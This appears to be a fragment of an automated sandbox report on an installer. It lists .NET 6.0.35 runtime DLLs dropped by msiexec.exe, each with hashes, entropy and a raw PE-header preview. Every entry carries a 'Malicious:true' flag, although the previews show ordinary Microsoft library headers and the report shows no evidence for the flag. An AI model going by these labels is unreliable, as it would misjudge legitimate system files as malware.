                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:H9Dux8VLSQjVqSlDrd5BpwxL55pskx5d7Cil:Htux8VLSQjVqSlDrd5BOxjmkx5d7CC
                                                                                                                                                                                                                                                                                                                                  MD5:5475964C62302DFD0A25A7243A9515CE
                                                                                                                                                                                                                                                                                                                                  SHA1:2E4FF863094D9E72BB1454066002DCA346A290F1
                                                                                                                                                                                                                                                                                                                                  SHA-256:B9720FCA323DD3B0169ABF221692C7A3F236FAF90C5694E10FA2806B5E41FD03
                                                                                                                                                                                                                                                                                                                                  SHA-512:2FEEC780CA49E2E018C26C9BC43FC0D6CFBEC590318437621C65C7B155EE233FD34B7534E515F0967B4110CC2077CDA0C01E8232C3C5C0B5128FF25709C656E7
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...;............." .........................................................@......A.....`...@......@............... .......................................)...Y.......)...0..$....B..T...............................................................H............text...k........................... ..`.data...#~..........................@....reloc..$....0......."..............@..B............................................0.......................|...4.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.................^.........#.?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o...p.....0.0.0.0.0.4.b.0.....d...C.o.m.m.e.n.t.s...I.n.t.e.r.n.a.l. .i.m.p.l.e.m.e.n.t.a.t.i.o.n. .p.a.c.k.a.g.e. .n.o.t. .m.e.a.n.t. .f.o.r. .d.i.r.e.c.t. .c.o.n.s.u.m.p.t.i.o.n... .P.l.e.a.s.e. .d.o. .n.o.t. .r.e.f.e.r.e.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Security.Cryptography.Cng.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):486664
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.690959844635634
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:SLV6FPkjfmpzkb1gH0BEuUWZpQmMcxhRl3W1E:RHFcY0BEuUWHQmMcxhC1E
                                                                                                                                                                                                                                                                                                                                  MD5:6285B8AFEAF9C4ECC2519A2ABCDA4A5D
                                                                                                                                                                                                                                                                                                                                  SHA1:AF11E8E1F8E904C93C47A28CDC606E66D2AB9C38
                                                                                                                                                                                                                                                                                                                                  SHA-256:B48DC65ABE78E81118D4C382C80650F5AE0D99AB6FBEBCD4DEAAB00FF7E0DBB8
                                                                                                                                                                                                                                                                                                                                  SHA-512:78DF10774CF735C6518E91D50ED5B2A0906F1174CF5F7A42B3328C5B688980540576F43BA73B133E2D2C1DB57D0A1AF8D1880DE02F234EBDC57B6F2E2D5400C3
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...<............" .........Z...............................................p.......J....`...@......@............... ..................................h........2...D...)...`......(0..T...........................................................h...H............text............................... ..`.data....P.......R..................@....reloc.......`.......<..............@..B............................................0.......................X.....4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.................^.........#.?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n.........p.....S.t.r.i.n.g.F.i.l.e.I.n.f.o...L.....0.0.0.0.0.4.b.0.....d...C.o.m.m.e.n.t.s...I.n.t.e.r.n.a.l. .i.m.p.l.e.m.e.n.t.a.t.i.o.n. .p.a.c.k.a.g.e. .n.o.t. .m.e.a.n.t. .f.o.r. .d.i.r.e.c.t. .c.o.n.s.u.m.p.t.i.o.n... .P.l.e.a.s.e. .d.o. .n.o.t. .r.e.f.e.r.e.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Security.Cryptography.Csp.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):189616
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.63337493461881
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:G6RmWBsH04GekCQUVP2xrwjy09JN/KBWAUQ335BotiEqKaMJDByGjLz:aWBs3jikjUBotrJMGjv
                                                                                                                                                                                                                                                                                                                                  MD5:6DA6288454299B3A91665D9A3FFD66BD
                                                                                                                                                                                                                                                                                                                                  SHA1:D2E26B1D89E7817899F6AD2898AC704CC6F2CD59
                                                                                                                                                                                                                                                                                                                                  SHA-256:89B1575E5F32F368B53496A3F15529FEDE58C0324E1A12FCD20609D6CA4DAA63
                                                                                                                                                                                                                                                                                                                                  SHA-512:A0301422806C16AA8990AC2936EB62468E089F4786909C41EAFDC4E6B0A40DBB7D3E1D544A954C705E8584E22FF30172A9909A860BACBC41C234BB640892949C
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................" ................................................................\.....`...@......@............... ..................................h...lO..X........(..........."..T...........................................................h...H............text.............................. ..`.data....).......*..................@....reloc..............................@..B............................................0.......................X.....4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.................^.........#.?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n.........p.....S.t.r.i.n.g.F.i.l.e.I.n.f.o...L.....0.0.0.0.0.4.b.0.....d...C.o.m.m.e.n.t.s...I.n.t.e.r.n.a.l. .i.m.p.l.e.m.e.n.t.a.t.i.o.n. .p.a.c.k.a.g.e. .n.o.t. .m.e.a.n.t. .f.o.r. .d.i.r.e.c.t. .c.o.n.s.u.m.p.t.i.o.n... .P.l.e.a.s.e. .d.o. .n.o.t. .r.e.f.e.r.e.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Security.Cryptography.Encoding.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):93960
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.412269331705843
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:Rh4T10wJ4hT5wzwW7c1LyoOeSRzxIdvaJyiyTzk0:R8SH5wzXcLyheSRzxavaQjTY0
                                                                                                                                                                                                                                                                                                                                  MD5:C048A59F3891B02B3BC8A194F3D21026
                                                                                                                                                                                                                                                                                                                                  SHA1:30D9CEB4188CF4A4B17138CAEFD3B2451B05D292
                                                                                                                                                                                                                                                                                                                                  SHA-256:59FAD34EEEE26623D44EE9D541D0E53D89A4D8A42BFF59FE466950A771BF4CFB
                                                                                                                                                                                                                                                                                                                                  SHA-512:27674625D2D249BF794DBC7F893FA403245A78B3D3DE7E32C72EC9CC7F496C2AF6752FC87B4599462128BDCBDDDF459C6754E1FDFF6148E0EFB7255FF72DE270
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................." .....&...................................................p.......|....`...@......@............... .......................................*..\....F...)...`..(.......T...............................................................H............text...C%.......&.................. ..`.data........@.......(..............@....reloc..(....`.......D..............@..B............................................0.......................p...(.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.................^.........#.?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o...d.....0.0.0.0.0.4.b.0.....d...C.o.m.m.e.n.t.s...I.n.t.e.r.n.a.l. .i.m.p.l.e.m.e.n.t.a.t.i.o.n. .p.a.c.k.a.g.e. .n.o.t. .m.e.a.n.t. .f.o.r. .d.i.r.e.c.t. .c.o.n.s.u.m.p.t.i.o.n... .P.l.e.a.s.e. .d.o. .n.o.t. .r.e.f.e.r.e.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Security.Cryptography.OpenSsl.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):32008
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.247706814220908
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:h9WAmkijRW8bwPV0D/F/pQ+1+HCeqtwlSYmxNOcVIFN2PiYA6VFHRN7xRxB+R9zD:ALeqylSYm71VI6qFClxRxw9zfr
                                                                                                                                                                                                                                                                                                                                  MD5:9648F56C224A96801B518AE5386AA184
                                                                                                                                                                                                                                                                                                                                  SHA1:9896F6B1D9A296BA0FF244A555814D52D914431C
                                                                                                                                                                                                                                                                                                                                  SHA-256:FFF0AAE4CAB8C18D606E6246FE42F290143DB0D3A88A1A1229A77D8BD8441E67
                                                                                                                                                                                                                                                                                                                                  SHA-512:C73F115BB4D0F40FF4723B634F74B909F29142A930B90431FA4395B7A6EE4FF3A5715A9D141D92D56448578D6A325637207644A330DA92D2756D363840D8AE8D
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................." .....N..........................................................j.....`...@......@............... ......................................@........T...)...p..........T...............................................................H............text...'L.......N.................. ..`.data........`.......P..............@....reloc.......p.......R..............@..B............................................0.............................4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.................^.........#.?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...b.%...C.o.m.m.e.n.t.s...S.y.s.t.e.m...S.e.c.u.r.i.t.y...C.r.y.p.t.o.g.r.a.p.h.y...O.p.e.n.S.s.l.....L.....C.o.m.p.a.n.y.N.a.m.e.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...r.%...F.i.l.e.D.e.s.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Security.Cryptography.Primitives.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):134832
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.565847770018715
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:nmpOj/BZX3krpmsUjMM+JbVUowS0hcbGWbrrrrrrrrrrrrrrrrrrrrrrrrrrrrr0:OOzBZXCPMpcbGnKk
                                                                                                                                                                                                                                                                                                                                  MD5:5CF4F3F906B7DC346D47B0796B2D621D
                                                                                                                                                                                                                                                                                                                                  SHA1:FCF0DE67C5D07ACE0D8951C2537636F99DE8D300
                                                                                                                                                                                                                                                                                                                                  SHA-256:77ED6C9832BBECAE32FE536D891EDA847405FA6AFE8801BE05B37FF6F759D299
                                                                                                                                                                                                                                                                                                                                  SHA-512:B9F501D60EB7CF60480D2BA9F2115FB99A88E9D2014E36FB49CEE0654C4FF79E219A7F3E0E838E6902ECDE1187386C0819A39B88CE171B4207724EC05C39287A
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....e............" .........(......................................................N.....`...@......@............... .......................................;...........(......d.......T...............................................................H............text...T........................... ..`.data....".......$..................@....reloc..d...........................@..B............................................0.............................4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.................^.........#.?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...h.(...C.o.m.m.e.n.t.s...S.y.s.t.e.m...S.e.c.u.r.i.t.y...C.r.y.p.t.o.g.r.a.p.h.y...P.r.i.m.i.t.i.v.e.s...L.....C.o.m.p.a.n.y.N.a.m.e.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...x.(...F.i.l.e.D.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Security.Cryptography.X509Certificates.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):569112
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.705893750506672
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:vAcy1XypsaHU2lIwi3iX4MbITp9whYDgPbxmBVWDw7nzNZwz:vsXyG6U2l0yYDgPbxmfWDwrT2
                                                                                                                                                                                                                                                                                                                                  MD5:AD8966E489A4FEB1AD013A6B8A193D1D
                                                                                                                                                                                                                                                                                                                                  SHA1:354514606D252A88BC71D04DBBA4353C14B99FB9
                                                                                                                                                                                                                                                                                                                                  SHA-256:78D5ADA7A18329B9902DFBB0AFD4F2D3A56A761D1A25E28BE0959B9C7E856783
                                                                                                                                                                                                                                                                                                                                  SHA-512:E211E153EB349C249750172DBEFA48DEC4CE01D8A935D353C37C61E7E04B373A7C76C7E8D2CCA2FCF8DE77DC0BB6C3ABAF54829FC993DC80263C511EBF4BBF33
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....]............" ................................................................zc....`...@......@............... ......................................X...@8.......)..........p4..T...............................................................H............text............................... ..`.data...............................@....reloc...............z..............@..B............................................0...........................X.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.................^.........#.?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0.....d...C.o.m.m.e.n.t.s...I.n.t.e.r.n.a.l. .i.m.p.l.e.m.e.n.t.a.t.i.o.n. .p.a.c.k.a.g.e. .n.o.t. .m.e.a.n.t. .f.o.r. .d.i.r.e.c.t. .c.o.n.s.u.m.p.t.i.o.n... .P.l.e.a.s.e. .d.o. .n.o.t. .r.e.f.e.r.e.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Security.Principal.Windows.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):151712
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.659992108362537
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:bhGUnc0ENS370LLFNAzreyfs2A1upqcyeeRAr:lvc5Np5N1Os2fmI
                                                                                                                                                                                                                                                                                                                                  MD5:64AEB21B8C192B802F2C7DBF18F9C2E0
                                                                                                                                                                                                                                                                                                                                  SHA1:3740D3BC11D4F46909FE0F552B146B473922D70C
                                                                                                                                                                                                                                                                                                                                  SHA-256:2DA3E9DCA14992E113B470A0D711A51FD265D7775D9AFFA7DBDF6BEC929601C0
                                                                                                                                                                                                                                                                                                                                  SHA-512:BC979D59F8F3D3AE8B0E7E9E4A7F76A6BE08D48A8940B014CDEA532B6EF10DA2DBE9D528A4F2ADEDF98D23C3A5B287F1570B1A0CDCC68FEEC5D7C1C3C0351425
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....J............" .........$...............................................P............`...@......@............... ..................................h....F.......(...(...@..........T...........................................................h...H............text...e........................... ..`.data...U.... ... ..................@....reloc.......@.......$..............@..B............................................0.......................X.....4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.................^.........#.?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n.........p.....S.t.r.i.n.g.F.i.l.e.I.n.f.o...L.....0.0.0.0.0.4.b.0.....d...C.o.m.m.e.n.t.s...I.n.t.e.r.n.a.l. .i.m.p.l.e.m.e.n.t.a.t.i.o.n. .p.a.c.k.a.g.e. .n.o.t. .m.e.a.n.t. .f.o.r. .d.i.r.e.c.t. .c.o.n.s.u.m.p.t.i.o.n... .P.l.e.a.s.e. .d.o. .n.o.t. .r.e.f.e.r.e.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Security.Principal.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15640
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.835682351794018
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:mFQiRxx1WjWVUFfW+WHWxNzx95jmHnhWgN7acWel9HeAwKUWX01k9z3Aia+6w7Eu:mT/EWiFfWTIX6HRN753HO2R9zza+d1
                                                                                                                                                                                                                                                                                                                                  MD5:66B8459A7C59846CD44FF73680C4D57C
                                                                                                                                                                                                                                                                                                                                  SHA1:5521416312890B86C416345F22DA8E1322E2F8E5
                                                                                                                                                                                                                                                                                                                                  SHA-256:10BDF418B380871231F3DB7EC68D756E5935D4EF39F97C017B07E5A4308C7468
                                                                                                                                                                                                                                                                                                                                  SHA-512:6BF64AFD3EA6D2D3EEF3EE8D278FC6504E7DB694AFDD5191883C3690B76C67F4F234F0B6CDF4945A5A705BC1B90A9C29D9CA4F3066AF18BEC2179230CC85AFF6
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...i............."!..0..............)... ........@.. ....................................`..................................)..S....@...................)...`.......(..8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H........ ......................P ........................................H.....+C........Pe..w.G.....Rq...H...O..d.(.^...d...=m}..o.....d.32...r5\.%4u...l[....`P....5.pq:._..c5k.j...MDRBSJB............v4.0.30319......`.......#~..X.......#Strings....X.......#GUID...h.......#Blob......................3......................................F........."...........;...........f.......d.................k...!.k.....k...[.k.....k.....k.....k...B.k...O.k...v.............

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Security.SecureString.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15632
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.8222624190824
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:sXt7kBrr7Hxo5qW193WZpWjA6Kr4PFHnhWgN7agWF1tfKUSIX01k9z3ARq/c9:yterFiqW193WZYA6VFHRN72D2IR9zoH
                                                                                                                                                                                                                                                                                                                                  MD5:D250B5CDEAD6EB54586E910070B68674
                                                                                                                                                                                                                                                                                                                                  SHA1:68B939B43A46DB57F4B500CB51A9A976EFC0862B
                                                                                                                                                                                                                                                                                                                                  SHA-256:E0BC424EFD7068DFC45FEA7CB30AE38D0B1A654CC74EF6C1D501D2CE688F6E07
                                                                                                                                                                                                                                                                                                                                  SHA-512:DF8AFF3A868831E4F4F39385300D4B702C0321CF15E8D0B38A5059D44C454B21C8C82BA4D26CA6A2966DE9DB8E963788921B34896CAA357FEB3F39E50541131A
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....%..........."!..0..............)... ........@.. ..............................r.....`..................................)..K....@...................)...`.......(..8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H........ ......................P ......................................e.v...v..aNd.7...?.<j..l...2CeD?.i...s-.0y.Y.C........5T.h............}!...J%q4m.$........Q4.....A......2...'.d....dBSJB............v4.0.30319......`.......#~..P.......#Strings....4.......#GUID...D.......#Blob......................3......................................2.....................3.r.........^.......S.................Z.....Z.....Z...S.Z.....Z...w.Z.....Z...:.Z...G.Z...n.............

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Security.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):18696
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.605933383250857
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:p+rueDGLr3WsBDWuxYA6VFHRN72FNbZR9zahhe:teDGPpvFCl2FFT9zse
                                                                                                                                                                                                                                                                                                                                  MD5:05968C5075CF8057D3330A93AA54CF64
                                                                                                                                                                                                                                                                                                                                  SHA1:D7AD923779991EFFA838F107F949358B36AE1B99
                                                                                                                                                                                                                                                                                                                                  SHA-256:E9FE6E6B9C8F6FED5C3E44D094742F762E67528FF943FEFB52D03B0422D4F8A0
                                                                                                                                                                                                                                                                                                                                  SHA-512:2EB2925D269A1C09A1BF5012563A3509322C16CC68B04B3210EB47FA7A92DDC78D23C3CBAD99D4E2A3F326CD6CE4F3723980D834FE917173B0BFEA3AA45786AE
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0.............^5... ...@....... ..............................+W....`..................................5..O....@..X............ ...)...`......44..T............................................ ............... ..H............text...d.... ...................... ..`.rsrc...X....@......................@..@.reloc.......`......................@..B................?5......H.......P ..d....................3......................................BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......H...#Blob............T.........3....................................O.................p...~.p.....;...............O.=.....}.....}...e.}.....}.....}...'.}...D.}.....}.....}...n.................7.p.................'.....'.....'...).'...1.'...9.'...A.'...I.'...Q.'...Y.'...a.'...i.'...q.'...y.'.....'. ...'.....'...

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.ServiceModel.Web.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):17680
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.6083676504439905
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:AiSEs6760DX88Hg10WGlD5WdpWjA6Kr4PFHnhWgN7agW43fKUSIX01k9z3ARq+da:Axj10WyD5WdYA6VFHRN7xP2IR9zojda
                                                                                                                                                                                                                                                                                                                                  MD5:8D40E6093D4EB840E2480D6E383EB442
                                                                                                                                                                                                                                                                                                                                  SHA1:2EA0372488E3EFCFAB7074751DF8B60309DDBB0C
                                                                                                                                                                                                                                                                                                                                  SHA-256:9DDCC239CE0E75AA7845E6DE8B31ADAA25C6B5EEE78D75EE904CDBBED7C7BBA0
                                                                                                                                                                                                                                                                                                                                  SHA-512:9FCC45BDDCF4B187B15C8EDA5E6CA40D7825B7A6D1142772EEA9B70A1F9967D7A9C709E513B0EB91A2200F301A72F356142408861DC4FEA27AA0CF825C64A838
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..............0... ...@....... ...............................J....`................................../..O....@...................)...`..........T............................................ ............... ..H............text... .... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................./......H.......P ......................`.......................................BSJB............v4.0.30319......l.......#~......,...#Strings............#US.........#GUID.......P...#Blob............T.........3....................................&.................................%.....?.....^.......S.....S...t.S...+.S.....S...X.S...u.S.....S...(.S...D.H.....H.........F.......{...........................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.....y......... .............

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.ServiceProcess.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):16648
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.715278782126483
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:alWpWnizlpFWqYA6VFHRN7qcTR9z6IkON:a4lFCl3V9zGON
                                                                                                                                                                                                                                                                                                                                  MD5:AA81502801E5AF25A5F74303D00A755A
                                                                                                                                                                                                                                                                                                                                  SHA1:590784EF4329D7F411979FFB77EA673C03B0539B
                                                                                                                                                                                                                                                                                                                                  SHA-256:F72F7BC1E1F16D3CF4F6C3162862F7F97B9108186BBD929B55DD94E6E98584D4
                                                                                                                                                                                                                                                                                                                                  SHA-512:509F31F1487081DD1D2B303B9C2F60E1620AF7D1D999A036B4B91FEAB085CD86101453E552993D1B913C5239AD575CC224708B3B6E23054E2E139B86CB66125B
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
